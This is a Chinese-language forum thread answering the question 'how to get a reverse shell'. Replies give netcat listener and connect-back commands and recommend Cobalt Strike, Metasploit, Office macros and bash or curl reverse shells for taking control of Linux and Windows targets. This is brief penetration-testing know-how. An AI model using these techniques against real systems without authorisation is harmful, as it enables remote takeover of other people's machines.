如何反弹shell

请先 登录 后评论

9 个回答

萬種

反弹shell,控制端监听在某TCP/UDP端口,被控端发起请求到该端口,不需要知道被控端ip

请先 登录 后评论
金蝉子

用nc瑞士军刀啊

攻击机nc -lvvp 端口

靶机nc ip  端口

请先 登录 后评论
Arthur

nc反弹,分很多种。

请先 登录 后评论
F_Lib

office宏反弹,powershell等,推荐使用Cobaltstike渗透神器,可以多种姿势,具体用方法可以百度

请先 登录 后评论
Colorado

nc反弹,这是经常用的一种

请先 登录 后评论
XG小刚 - 小菜鸡

看看是win还是linux,判断系统是否出网

linux自带nc,可以尝试反弹shell,你的本地ip不清楚情况下尝试使用正向shell进行连接

或者开一台公网vps进行反弹shell

win的话没有nc,可以上传nc,但建议直接cs或msf上线

请先 登录 后评论
王陌少

linux机器的话可以考虑nc ,linux自带nc。正向连接去执行。

windows可以试试msf用正向的协议生成一个木马进行上线。

请先 登录 后评论
阿蓝

linux下nc反弹shell,本地监听便可

windows下nc也可以,但建议windows下cs或者msf直接上线便可,当然linux下也可以

请先 登录 后评论
Johnson666

Linux下可以利用bash反弹、curl反弹、whois反弹等等,不过linux自带了nc,我更喜欢用nc来搞;Windows下就没有自带nc了,需要上传个nc上去或者powercat类似nc,不过我最多的还是用msf和cs来做了。

请先 登录 后评论